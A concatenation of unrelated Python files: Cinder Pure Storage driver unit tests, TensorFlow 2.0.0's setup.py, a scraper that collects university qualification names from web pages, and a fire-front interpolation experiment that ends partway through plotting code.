self.assertEqual(ISCSI_PORTS, ret)
def test_get_target_iscsi_ports_with_no_ports(self):
# Should raise an exception if there are no ports
self.array.list_ports.return_value = []
self.assertRaises(exception.PureDriverException,
self.driver._get_target_iscsi_ports)
def test_get_target_iscsi_ports_with_only_fc_ports(self):
        # Should raise an exception if there are no iSCSI ports
self.array.list_ports.return_value = PORTS_WITHOUT
self.assertRaises(exception.PureDriverException,
self.driver._get_target_iscsi_ports)
@mock.patch("cinder.volume.utils.generate_password", autospec=True)
@mock.patch(ISCSI_DRIVER_OBJ + "._get_host", autospec=True)
@mock.patch(ISCSI_DRIVER_OBJ + "._generate_purity_host_name", spec=True)
def test_connect(self, mock_generate, mock_host, mock_gen_secret):
vol_name = VOLUME["name"] + "-cinder"
result = {"vol": vol_name, "lun": 1}
# Branch where host already exists
mock_host.return_value = PURE_HOST
self.array.connect_host.return_value = {"vol": vol_name, "lun": 1}
real_result = self.driver._connect(VOLUME, ISCSI_CONNECTOR, None)
self.assertEqual(result, real_result)
mock_host.assert_called_with(self.driver, ISCSI_CONNECTOR)
self.assertFalse(mock_generate.called)
self.assertFalse(self.array.create_host.called)
self.array.connect_host.assert_called_with(PURE_HOST_NAME, vol_name)
# Branch where new host is created
mock_host.return_value = None
mock_generate.return_value = PURE_HOST_NAME
real_result = self.driver._connect(VOLUME, ISCSI_CONNECTOR, None)
mock_host.assert_called_with(self.driver, ISCSI_CONNECTOR)
mock_generate.assert_called_with(HOSTNAME)
self.array.create_host.assert_called_with(PURE_HOST_NAME,
iqnlist=[INITIATOR_IQN])
self.assertEqual(result, real_result)
mock_generate.reset_mock()
self.array.reset_mock()
self.assert_error_propagates(
[mock_host, mock_generate, self.array.connect_host,
self.array.create_host],
self.driver._connect, VOLUME, ISCSI_CONNECTOR, None)
self.mock_config.use_chap_auth = True
chap_user = ISCSI_CONNECTOR["host"]
chap_password = "sOmEseCr3t"
# Branch where chap is used and credentials already exist
initiator_data = [{"key": pure.CHAP_SECRET_KEY,
"value": chap_password}]
self.driver._connect(VOLUME, ISCSI_CONNECTOR, initiator_data)
result["auth_username"] = chap_user
result["auth_password"] = chap_password
self.assertDictMatch(result, real_result)
self.array.set_host.assert_called_with(PURE_HOST_NAME,
host_user=chap_user,
host_password=chap_password)
# Branch where chap is used and credentials are generated
mock_gen_secret.return_value = chap_password
self.driver._connect(VOLUME, ISCSI_CONNECTOR, None)
result["auth_username"] = chap_user
result["auth_password"] = chap_password
result["initiator_update"] = {
"set_values": {
pure.CHAP_SECRET_KEY: chap_password
},
}
self.assertDictMatch(result, real_result)
self.array.set_host.assert_called_with(PURE_HOST_NAME,
host_user=chap_user,
host_password=chap_password)
@mock.patch(ISCSI_DRIVER_OBJ + "._get_host", autospec=True)
def test_connect_already_connected(self, mock_host):
mock_host.return_value = PURE_HOST
expected = {"host": PURE_HOST_NAME, "lun": 1}
self.array.list_volume_private_connections.return_value = \
[expected, {"host": "extra", "lun": 2}]
self.array.connect_host.side_effect = \
self.purestorage_module.PureHTTPError(
code=400,
text="Connection already exists"
)
actual = self.driver._connect(VOLUME, ISCSI_CONNECTOR, None)
self.assertEqual(expected, actual)
self.assertTrue(self.array.connect_host.called)
        self.assertTrue(self.array.list_volume_private_connections.called)
@mock.patch(ISCSI_DRIVER_OBJ + "._get_host", autospec=True)
def test_connect_already_connected_list_hosts_empty(self, mock_host):
mock_host.return_value = PURE_HOST
self.array.list_volume_private_connections.return_value = {}
self.array.connect_host.side_effect = \
self.purestorage_module.PureHTTPError(
code=400,
text="Connection already exists"
)
self.assertRaises(exception.PureDriverException, self.driver._connect,
VOLUME, ISCSI_CONNECTOR, None)
self.assertTrue(self.array.connect_host.called)
        self.assertTrue(self.array.list_volume_private_connections.called)
@mock.patch(ISCSI_DRIVER_OBJ + "._get_host", autospec=True)
def test_connect_already_connected_list_hosts_exception(self, mock_host):
mock_host.return_value = PURE_HOST
self.array.list_volume_private_connections.side_effect = \
self.purestorage_module.PureHTTPError(code=400, text="")
self.array.connect_host.side_effect = \
self.purestorage_module.PureHTTPError(
code=400,
text="Connection already exists"
)
self.assertRaises(self.purestorage_module.PureHTTPError,
self.driver._connect, VOLUME, ISCSI_CONNECTOR, None)
self.assertTrue(self.array.connect_host.called)
        self.assertTrue(self.array.list_volume_private_connections.called)
class PureFCDriverTestCase(PureDriverTestCase):
def setUp(self):
super(PureFCDriverTestCase, self).setUp()
self.driver = pure.PureFCDriver(configuration=self.mock_config)
self.driver._array = self.array
self.driver._lookup_service = mock.Mock()
def test_do_setup(self):
self.purestorage_module.FlashArray.return_value = self.array
self.array.get_rest_version.return_value = \
self.driver.SUPPORTED_REST_API_VERSIONS[0]
self.driver.do_setup(None)
self.purestorage_module.FlashArray.assert_called_with(
TARGET,
api_token=API_TOKEN
)
self.assertEqual(self.array, self.driver._array)
self.assertEqual(
self.driver.SUPPORTED_REST_API_VERSIONS,
self.purestorage_module.FlashArray.supported_rest_versions
)
def test_get_host(self):
good_host = PURE_HOST.copy()
good_host.update(wwn=["another-wrong-wwn", INITIATOR_WWN])
bad_host = {"name": "bad-host", "wwn": ["wrong-wwn"]}
self.array.list_hosts.return_value = [bad_host]
actual_result = self.driver._get_host(FC_CONNECTOR)
self.assertIs(None, actual_result)
self.array.list_hosts.return_value.append(good_host)
actual_result = self.driver._get_host(FC_CONNECTOR)
self.assertEqual(good_host, actual_result)
self.assert_error_propagates([self.array.list_hosts],
self.driver._get_host, FC_CONNECTOR)
@mock.patch(FC_DRIVER_OBJ + "._connect")
def test_initialize_connection(self, mock_connection):
lookup_service = self.driver._lookup_service
(lookup_service.get_device_mapping_from_network.
return_value) = DEVICE_MAPPING
mock_connection.return_value = {"vol": VOLUME["name"] + "-cinder",
"lun": 1,
}
self.array.list_ports.return_value = FC_PORTS
actual_result = self.driver.initialize_connection(VOLUME, FC_CONNECTOR)
self.assertDictMatch(FC_CONNECTION_INFO, actual_result)
@mock.patch(FC_DRIVER_OBJ + "._get_host", autospec=True)
@mock.patch(FC_DRIVER_OBJ + "._generate_purity_host_name", spec=True)
def test_connect(self, mock_generate, mock_host):
vol_name = VOLUME["name"] + "-cinder"
result = {"vol": vol_name, "lun": 1}
# Branch where host already exists
mock_host.return_value = PURE_HOST
self.array.connect_host.return_value = {"vol": vol_name, "lun": 1}
real_result = self.driver._connect(VOLUME, FC_CONNECTOR)
self.assertEqual(result, real_result)
mock_host.assert_called_with(self.driver, FC_CONNECTOR)
self.assertFalse(mock_generate.called)
self.assertFalse(self.array.create_host.called)
self.array.connect_host.assert_called_with(PURE_HOST_NAME, vol_name)
# Branch where new host is created
mock_host.return_value = None
mock_generate.return_value = PURE_HOST_NAME
real_result = self.driver._connect(VOLUME, FC_CONNECTOR)
mock_host.assert_called_with(self.driver, FC_CONNECTOR)
mock_generate.assert_called_with(HOSTNAME)
self.array.create_host.assert_called_with(PURE_HOST_NAME,
wwnlist={INITIATOR_WWN})
self.assertEqual(result, real_result)
mock_generate.reset_mock()
self.array.reset_mock()
self.assert_error_propagates(
[mock_host, mock_generate, self.array.connect_host,
self.array.create_host],
self.driver._connect, VOLUME, FC_CONNECTOR)
@mock.patch(FC_DRIVER_OBJ + "._get_host", autospec=True)
def test_connect_already_connected(self, mock_host):
mock_host.return_value = PURE_HOST
expected = {"host": PURE_HOST_NAME, "lun": 1}
self.array.list_volume_private_connections.return_value = \
[expected, {"host": "extra", "lun": 2}]
self.array.connect_host.side_effect = \
self.purestorage_module.PureHTTPError(
code=400,
text="Connection already exists"
)
actual = self.driver._connect(VOLUME, FC_CONNECTOR)
self.assertEqual(expected, actual)
self.assertTrue(self.array.connect_host.called)
        self.assertTrue(self.array.list_volume_private_connections.called)
@mock.patch(FC_DRIVER_OBJ + "._get_host", autospec=True)
def test_connect_already_connected_list_hosts_empty(self, mock_host):
mock_host.return_value = PURE_HOST
self.array.list_volume_private_connections.return_value = {}
self.array.connect_host.side_effect = \
self.purestorage_module.PureHTTPError(
code=400,
text="Connection already exists"
)
self.assertRaises(exception.PureDriverException, self.driver._connect,
VOLUME, FC_CONNECTOR)
self.assertTrue(self.array.connect_host.called)
        self.assertTrue(self.array.list_volume_private_connections.called)
@mock.patch(FC_DRIVER_OBJ + "._get_host", autospec=True)
def test_connect_already_connected_list_hosts_exception(self, mock_host):
mock_host.return_value = PURE_HOST
self.array.list_volume_private_connections.side_effect = \
self.purestorage_module.PureHTTPError(code=400, text="")
self.array.connect_host.side_effect = \
self.purestorage_module.PureHTTPError(
code=400,
text="Connection already exists"
)
self.assertRaises(self.purestorage_module.PureHTTPError,
self.driver._connect, VOLUME, FC_CONNECTOR)
self.assertTrue(self.array.connect_host.called)
        self.assertTrue(self.array.list_volume_private_connections.called)
|
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorFlow is an open source machine learning framework for everyone.
TensorFlow is an open source software library for high performance numerical
computation. Its flexible architecture allows easy deployment of computation
across a variety of platforms (CPUs, GPUs, TPUs), and from desktops to clusters
of servers to mobile and edge devices.
Originally developed by researchers and engineers from the Google Brain team
within Google's AI organization, it comes with strong support for machine
learning and deep learning and the flexible numerical computation core is used
across many other scientific domains.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import fnmatch
import os
import re
import sys
from setuptools import Command
from setuptools import find_packages
from setuptools import setup
from setuptools.command.install import install as InstallCommandBase
from setuptools.dist import Distribution
DOCLINES = __doc__.split('\n')
# This version string is semver compatible, but incompatible with pip.
# For pip, we will remove all '-' characters from this string, and use the
# result for pip.
# Also update tensorflow/tensorflow.bzl and
# tensorflow/core/public/version.h
_VERSION = '2.0.0'
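# For example, a semver pre-release such as '2.0.0-rc1' would become
# '2.0.0rc1' for pip (see the _VERSION.replace('-', '') call in setup()).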
REQUIRED_PACKAGES = [
'absl-py >= 0.7.0',
'astor >= 0.6.0',
'backports.weakref >= 1.0rc1;python_version<"3.4"',
'enum34 >= 1.1.6;python_version<"3.4"',
'gast == 0.2.2',
'google_pasta >= 0.1.8',
'keras_applications >= 1.0.8',
'keras_preprocessing >= 1.1.0',
'numpy >= 1.16.0, < 2.0',
'opt_einsum >= 2.3.2',
'protobuf >= 3.8.0',
'tensorboard >= 2.0.0, < 2.1.0',
'tensorflow_estimator >= 2.0.0, < 2.1.0',
'termcolor >= 1.1.0',
'wrapt >= 1.11.1',
# python3 requires wheel 0.26
'wheel >= 0.26;python_version>="3"',
'wheel;python_version<"3"',
# mock comes with unittest.mock for python3, need to install for python2
'mock >= 2.0.0;python_version<"3"',
    # functools32 backports Python 3.2 functools features (e.g. lru_cache)
    # to python2
'functools32 >= 3.2.3;python_version<"3"',
'six >= 1.12.0',
]
if sys.byteorder == 'little':
# grpcio does not build correctly on big-endian machines due to lack of
# BoringSSL support.
# See https://github.com/tensorflow/tensorflow/issues/17882.
REQUIRED_PACKAGES.append('grpcio >= 1.8.6')
project_name = 'tensorflow'
if '--project_name' in sys.argv:
project_name_idx = sys.argv.index('--project_name')
project_name = sys.argv[project_name_idx + 1]
sys.argv.remove('--project_name')
sys.argv.pop(project_name_idx)
# tf-nightly should depend on tb-nightly
if 'tf_nightly' in project_name:
for i, pkg in enumerate(REQUIRED_PACKAGES):
if 'tensorboard' in pkg:
REQUIRED_PACKAGES[i] = 'tb-nightly >= 2.1.0a0, < 2.2.0a0'
elif 'tensorflow_estimator' in pkg and '2.0' in project_name:
REQUIRED_PACKAGES[i] = 'tensorflow-estimator-2.0-preview'
elif 'tensorflow_estimator' in pkg:
REQUIRED_PACKAGES[i] = 'tf-estimator-nightly'
# pylint: disable=line-too-long
CONSOLE_SCRIPTS = [
'toco_from_protos = tensorflow.lite.toco.python.toco_from_protos:main',
'tflite_convert = tensorflow.lite.python.tflite_convert:main',
'toco = tensorflow.lite.python.tflite_convert:main',
'saved_model_cli = tensorflow.python.tools.saved_model_cli:main',
# We need to keep the TensorBoard command, even though the console script
# is now declared by the tensorboard pip package. If we remove the
# TensorBoard command, pip will inappropriately remove it during install,
# even though the command is not removed, just moved to a different wheel.
'tensorboard = tensorboard.main:run_main',
'tf_upgrade_v2 = tensorflow.tools.compatibility.tf_upgrade_v2_main:main',
'estimator_ckpt_converter = tensorflow_estimator.python.estimator.tools.checkpoint_converter:main',
]
# pylint: enable=line-too-long
# Only keep freeze_graph console script in 1.X.
if _VERSION.startswith('1.') and '_2.0' not in project_name:
CONSOLE_SCRIPTS.append(
'freeze_graph = tensorflow.python.tools.freeze_graph:run_main')
# remove the tensorboard console script if building tf_nightly
if 'tf_nightly' in project_name:
CONSOLE_SCRIPTS.remove('tensorboard = tensorboard.main:run_main')
TEST_PACKAGES = [
'scipy >= 0.15.1',
]
class BinaryDistribution(Distribution):
def has_ext_modules(self):
return True
class InstallCommand(InstallCommandBase):
"""Override the dir where the headers go."""
def finalize_options(self):
ret = InstallCommandBase.finalize_options(self)
self.install_headers = os.path.join(self.install_purelib, 'tensorflow_core',
'include')
self.install_lib = self.install_platlib
return ret
class InstallHeaders(Command):
"""Override how headers are copied.
The install_headers that comes with setuptools copies all files to
the same directory. But we need the files to be in a specific directory
hierarchy for -I <include_dir> to work correctly.
"""
description = 'install C/C++ header files'
user_options = [('install-dir=', 'd',
'directory to install header files to'),
('force', 'f',
'force installation (overwrite existing files)'),
]
boolean_options = ['force']
def initialize_options(self):
self.install_dir = None
self.force = 0
self.outfiles = []
def finalize_options(self):
self.set_undefined_options('install',
('install_headers', 'install_dir'),
('force', 'force'))
def mkdir_and_copy_file(self, header):
install_dir = os.path.join(self.install_dir, os.path.dirname(header))
# Get rid of some extra intervening directories so we can have fewer
# directories for -I
install_dir = re.sub('/google/protobuf_archive/src', '', install_dir)
install_dir = re.sub('/include/tensorflow_core/', '/include/tensorflow/',
install_dir)
# Copy external code headers into tensorflow_core/include.
# A symlink would do, but the wheel file that gets created ignores
# symlink within the directory hierarchy.
# NOTE(keveman): Figure out how to customize bdist_wheel package so
# we can do the symlink.
external_header_locations = [
'tensorflow_core/include/external/eigen_archive/',
'tensorflow_core/include/external/com_google_absl/',
]
for location in external_header_locations:
if location in install_dir:
extra_dir = install_dir.replace(location, '')
if not os.path.exists(extra_dir):
self.mkpath(extra_dir)
self.copy_file(header, extra_dir)
if not os.path.exists(install_dir):
self.mkpath(install_dir)
return self.copy_file(header, install_dir)
def run(self):
hdrs = self.distribution.headers
if not hdrs:
return
self.mkpath(self.install_dir)
for header in hdrs:
(out, _) = self.mkdir_and_copy_file(header)
self.outfiles.append(out)
def get_inputs(self):
return self.distribution.headers or []
def get_outputs(self):
return self.outfiles
def find_files(pattern, root):
"""Return all the files matching pattern below root dir."""
for dirpath, _, files in os.walk(root):
for filename in fnmatch.filter(files, pattern):
yield os.path.join(dirpath, filename)
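# For example, find_files('*.h', 'tensorflow_core/core') yields every header
# under that tree, such as 'tensorflow_core/core/framework/op.h'
# (illustrative path).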
so_lib_paths = [
i for i in os.listdir('.')
if os.path.isdir(i) and fnmatch.fnmatch(i, '_solib_*')
]
matches = []
for path in so_lib_paths:
matches.extend(
['../' + x for x in find_files('*', path) if '.py' not in x]
)
if os.name == 'nt':
EXTENSION_NAME = 'python/_pywrap_tensorflow_internal.pyd'
else:
EXTENSION_NAME = 'python/_pywrap_tensorflow_internal.so'
headers = (
list(find_files('*.h', 'tensorflow_core/core')) +
list(find_files('*.h', 'tensorflow_core/stream_executor')) +
list(find_files('*.h', 'google/com_google_protobuf/src')) +
list(find_files('*.inc', 'google/com_google_protobuf/src')) +
list(find_files('*', 'third_party/eigen3')) + list(
find_files('*.h', 'tensorflow_core/include/external/com_google_absl')) +
list(
find_files('*.inc', 'tensorflow_core/include/external/com_google_absl'))
+ list(find_files('*', 'tensorflow_core/include/external/eigen_archive')))
setup(
name=project_name,
version=_VERSION.replace('-', ''),
description=DOCLINES[0],
long_description='\n'.join(DOCLINES[2:]),
url='https://www.tensorflow.org/',
download_url='https://github.com/tensorflow/tensorflow/tags',
author='Google Inc.',
author_email='packages@tensorflow.org',
# Contained modules and scripts.
packages=find_packages(),
entry_points={
'console_scripts': CONSOLE_SCRIPTS,
},
headers=headers,
install_requires=REQUIRED_PACKAGES,
tests_require=REQUIRED_PACKAGES + TEST_PACKAGES,
# Add in any packaged data.
include_package_data=True,
package_data={
'tensorflow': [
EXTENSION_NAME,
] + matches,
},
zip_safe=False,
distclass=BinaryDistribution,
cmdclass={
'install_headers': InstallHeaders,
'install': InstallCommand,
},
# PyPI package information.
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Intended Audience :: Education',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Mathematics',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
'Topic :: Software Development',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
],
license='Apache 2.0',
keywords='tensorflow tensor machine learning',
)
|
|
import requests
from bs4 import BeautifulSoup
from bs4.element import Comment
import re
from utils.common.nlp import tokenize_alphanum
from utils.common.datapipeline import DataPipeline
from utils.common.browser import SelfClosingBrowser
from utils.common.db_utils import read_all_results
_pattern = re.compile(r'[\W_]+')
def split_and_strip(text):
return [_pattern.sub('', t.lower())
for t in text.split()]
def tag_visible(element):
if element.parent.name in ['style', 'script', 'head',
'title', 'meta', '[document]']:
return False
if isinstance(element, Comment):
return False
return True
def len_sentence(x):
try:
return len(tokenize_alphanum(x))
except TypeError as err:
print("Error with", x)
raise err
def get_sentences(url, return_url=False, selenium=False):
html = ''
if selenium:
with SelfClosingBrowser() as driver:
driver.get(url)
html = driver.page_source
else:
r = requests.get(url)
if r.status_code != 200:
print(url, "not found")
return []
html = r.text
soup = BeautifulSoup(html, "lxml")
texts = soup.findAll(text=True)
visible_texts = filter(tag_visible, texts)
if not return_url:
return [t.strip() for t in visible_texts
if len_sentence(t) > 0]
# Otherwise, find corresponding URL
sentences = []
anchors = [a for a in soup.findAll("a")
if tag_visible(a) and
len_sentence(a.text) > 0]
anchor_text = [a.text for a in anchors]
for t in visible_texts:
if len_sentence(t) == 0:
continue
_url = ''
if t in anchor_text:
a = list(filter(lambda a: t == a.text, anchors))[0]
if "href" in a.attrs:
_url = a.attrs["href"]
sentences.append(dict(go_to_url=_url, text=t, found_on_url=url))
return sentences
def clean_text(t, qual_map):
# Remove strings containing numbers
if any(char.isdigit() for char in t):
return None
# Replace bad chars
bad_chars = ["\n", "\r"]
for c in bad_chars:
t = t.replace(c, "")
# Strip space
while " " in t:
t = t.replace(" ", " ")
t = t.lstrip()
t = t.rstrip()
words = t.split()
    # Discard strings with too many words
if len(words) > 11:
return None
# Standardise qualifications
for w in t.split():
if w in qual_map:
t = t.replace(w, min(qual_map[w], key=len))
    # "program" is a misleading word; discard strings containing it
if "program" in t.lower():
return None
# Require the standardised string to contain one of these
if not any(x in split_and_strip(t)
for x in ["bachelor", "master", "phd", "doctor", "diploma"]):
return None
return t
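# Worked example (hypothetical qual_map entry): with
# qual_map = {"MSc": {"Master of Science"}},
# clean_text("MSc  Economics\n", qual_map) collapses the whitespace, expands
# the abbreviation to the shortest standard form, and returns
# "Master of Science Economics", while clean_text("MSc program", qual_map)
# returns None because of "program".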
def flush(url_courses, config):
n_flush = 0
with DataPipeline(config) as dp:
for top_url, rows in url_courses.items():
for row in rows:
n_flush += 1
row["top_url"] = top_url
dp.insert(row)
print("flushed", n_flush)
def run(config):
# Read qualifications
qual_map = {}
_results = read_all_results(config, "input_db", "input_table")
for std, abbrv in _results:
if abbrv not in qual_map:
qual_map[abbrv] = set()
qual_map[abbrv].add(std)
# Read urls which have already been done
_results = read_all_results(config, "output_db", "table_name")
already_done_urls = set(url for _, url, _, _ in _results)
print("Already found", len(already_done_urls), "previous urls")
# Read urls
_results = read_all_results(config, "input_db", "input_table_urls")
kws = ["program", "graduate", "admission", "phd", "ma", "ba", "bsc", "msc",
"dip", " doc"]
_kws = ["tel:", "news", "mailto", "/events", "calendar", "jobs.", "upload",
".pdf", ".jpg", "bulletin", "/email", "/tel/"]
urls_to_try = {}
n_skip = 0
n_todo = 0
for top_url, url, _ in _results:
if not any(kw in url.lower() for kw in kws):
continue
if any(kw in url.lower() for kw in _kws):
continue
if url in already_done_urls:
n_skip += 1
continue
if top_url not in urls_to_try:
urls_to_try[top_url] = []
n_todo += 1
urls_to_try[top_url].append(url)
print("Skipping", n_skip, ", doing", n_todo)
# Read UCAS courses
ucas_results = read_all_results(config, "input_db", "input_table_ucas")
ucas_courses = set(x[0] for x in ucas_results)
# Filter out long courses
ucas_courses = list(filter(lambda x: len(x.split()) < 6, ucas_courses))
# Check which URLs require selenium
selenium_urls = {url: wait_for for url, wait_for in
read_all_results(config, "external_db",
"input_table_selenium")}
# Only add if not already found
url_courses = {}
flush_lim = 100
iflush = 0
for top_url, urls in urls_to_try.items():
print(top_url, len(urls))
selenium = False
if top_url in selenium_urls:
print("===> Using selenium")
selenium = True
url_courses[top_url] = []
for url in set(urls):
# Generate results
n_results = 0
_results = get_sentences(url, return_url=True, selenium=selenium)
results = []
unique_texts = set()
for data in _results:
data["text"] = clean_text(data["text"], qual_map)
if data["text"] is None:
continue
if data["text"] not in unique_texts:
unique_texts.add(data["text"])
results.append(data)
for data in results:
url_courses[top_url].append(data)
n_results += 1
if n_results == 0:
data = dict(text="", go_to_url="", found_on_url=url)
url_courses[top_url].append(data)
iflush += n_results
# Flush if required
if iflush >= flush_lim:
iflush = 0
flush(url_courses, config)
for k, _ in url_courses.items():
url_courses[k] = []
# Final flush
flush(url_courses, config)
|
|
"""Test fire front interpolation"""
# Copyright (c) 2019, CNRS-LAAS
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
#
#
import itertools
import os
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm
import skimage.io
import skimage.draw
import skimage.measure
import scipy.interpolate
import fire_rs.geodata.environment as g_environment
import fire_rs.geodata.display as display
import fire_rs.rbf
from fire_rs.geodata.geo_data import GeoData
from fire_rs.firemodel.propagation import Environment, FirePropagation, TimedPoint
################################################################################
# World initialization
FIRERS_DATA_FOLDER = '/home/rbailonr/firers_data_porto'
FIRERS_DEM_DATA = os.path.join(FIRERS_DATA_FOLDER, 'dem')
FIRERS_WIND_DATA = os.path.join(FIRERS_DATA_FOLDER, 'wind')
FIRERS_LANDCOVER_DATA = os.path.join(FIRERS_DATA_FOLDER, 'landcover')
the_world = g_environment.World(elevation_path=FIRERS_DEM_DATA,
wind_path=FIRERS_WIND_DATA,
landcover_path=FIRERS_LANDCOVER_DATA, wind_mesh_resolution='fine',
landcover_to_fuel_remap=g_environment.SLOW_FUELMODEL_REMAP)
the_world.dem_wind_tile_split = 1
area = ((2776825.0 - 2500, 2776825.0 + 2500), (2212175.0 - 2500, 2212175.0 + 4500))
ignition = TimedPoint(2776825.0, 2212175.0, 0)
################################################################################
# Reference fire propagation
fire_env = Environment(area, 5., np.pi / 2, the_world)
fire_prop = FirePropagation(fire_env)
fire_prop.set_ignition_point(ignition)
# propagation_end_time = 60 * 60 * 60
propagation_end_time = np.inf
fire_prop.propagate(propagation_end_time)
################################################################################
# Reference fire display
# Figure terrain + ignition contour + ignition point
gdd = display.GeoDataDisplay.pyplot_figure(
fire_env.raster.combine(fire_prop.ignitions().slice(["ignition"])), frame=(0., 0.))
gdd.draw_elevation_shade(with_colorbar=False, cmap=matplotlib.cm.terrain)
gdd.draw_wind_quiver()
gdd.draw_ignition_contour(with_labels=True, cmap=matplotlib.cm.plasma)
gdd.draw_ignition_points(ignition)
gdd.figure.show()
################################################################################
# Contour extraction
firemap = fire_prop.ignitions()
fire_image = np.ones(firemap.data.shape, dtype=np.float64) * np.NaN
firepoints = {}
# The ignition point is known
firepoints[fire_prop.ignitions().array_index((ignition[0], ignition[1]))] = ignition[2]
# Create contour with scikit-image
contours1 = skimage.measure.find_contours(firemap.data["ignition"], 21 * 60 * 60)
contours2 = skimage.measure.find_contours(firemap.data["ignition"], 20 * 60 * 60)
contours3 = skimage.measure.find_contours(firemap.data["ignition"], 22 * 60 * 60)
contours4 = skimage.measure.find_contours(firemap.data["ignition"], 40 * 60 * 60)
contours5 = skimage.measure.find_contours(firemap.data["ignition"], 41 * 60 * 60)
contours6 = skimage.measure.find_contours(firemap.data["ignition"], 42 * 60 * 60)
# Print contour as binary image
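# comp_cycle alternates the comparison between successive contour levels, so
# only the first half of each contour's points is kept for one level and only
# the second half for the next, thinning the points fed to the interpolation.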
comp_cycle = itertools.cycle([lambda x, y: x < y, lambda x, y: x > y])
comp = next(comp_cycle)
for i in [contours1, contours2, contours3, contours4, contours5, contours6]:
comp = next(comp_cycle)
for contour in i:
for pt_i in range(len(contour)):
if comp(pt_i, len(contour) / 2):
continue
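            # pt_i % 1 == 0 always holds; raise the modulus to subsample the
            # contour points if needed.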
if pt_i % 1 == 0:
rr, cc = skimage.draw.line(*np.asarray(contour[pt_i - 1], dtype=int),
*np.asarray(contour[pt_i], dtype=int))
fire_image[rr, cc] = firemap.data["ignition"][rr[0], cc[0]]
for r, c in zip(rr, cc):
firepoints[r, c] = firemap.data["ignition"][r, c]
fig = plt.figure()
ax = fig.gca()
imag = ax.imshow(fire_image / 60.)
fig.colorbar(imag, ax=ax, shrink=0.65, aspect=20, format="%d minutes")
fig.show()
################################################################################
# Interpolate contour
x, y = list(zip(*firepoints.keys()))
z = tuple(firepoints.values())
function = 'thin_plate'
# function = 'linear'
# function = 'multiquadric'
# function = 'cubic'
# function = lambda a: np.sin(a)
# Wildland fire modeling with an Eulerian level set method and automated calibration
# might give a clue of which kind of kernel function to use
zfun_smooth_rbf = fire_rs.rbf.Rbf(x, y, z, function=function, epsilon=0.1,
smooth=0) # default smooth=0 for interpolation
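# fire_rs.rbf appears to follow scipy.interpolate.Rbf's interface: smooth=0
# makes the interpolant pass exactly through the sampled fire front points,
# while larger values trade exactness for a smoother surface.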
xi = np.linspace(0, firemap.data.shape[0] - 1, firemap.data.shape[0])
yi = np.linspace(0, firemap.data.shape[1] - 1, firemap.data.shape[1])
meshgrid = np.meshgrid(xi, yi, indexing="ij")
z_dense_smooth_rbf = zfun_smooth_rbf(
*[x.flatten() for x in meshgrid]) # not really a function, but a callable class instance
z_dense_smooth_rbf = z_dense_smooth_rbf.reshape(len(xi), len(yi))
################################################################################
# Display interpolation
fig = plt.figure()
ax = fig.gca()
levels = list(range(0, 70 * 60 * 60, 10 * 60 * 60))
ax.imshow(fire_image)
c1 = ax.contour(z_dense_smooth_rbf, levels=levels)
ax.clabel(c1)
c2 = ax.contour(firemap.data["ignition"], levels=levels, alpha=0.6)
# ax.imshow(z_dense_smooth_rbf - firemap.data["ignition"])
ax.clabel(c2)
ax.imshow(fire_image)
fig.show()
################################################################################
# Display error
fig = plt.figure()
ax = fig.gca()
levels = list(range(0, 70 * 60, 10 * 60))
diferencia = z_dense_smooth_rbf - firemap.data["ignition"]
# ax.imshow(firemap.data["ignition"])
# 150 min corresponds to about 200 m for a 5 km/h wind, along the wind direction
diff_image = ax.imshow(diferencia / 60., cmap=matplotlib.cm.seismic, vmin=-150, vmax=150)
cb = fig.colorbar(diff_image, ax=ax, shrink=0.65, aspect=20, format="%d minutes")
cb.set_label("Interpolation error")
ax.imshow(fire_image, cmap=matplotlib.cm.cool)
c2 = ax.contour(firemap.data["ignition"] / 60., levels=levels, cmap=matplotlib.cm.cool)
ax.clabel(c2)
# ax.imshow(fire_image)
fig.show()
################################################################################
# In 3D
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure()
ax = fig.add_subplot(121, projection='3d')
ax.plot_surface(*meshgrid, z_dense_smooth_rbf, color="blue")
fig.show()
ax = fig.add_subplot(122, projection='3d')
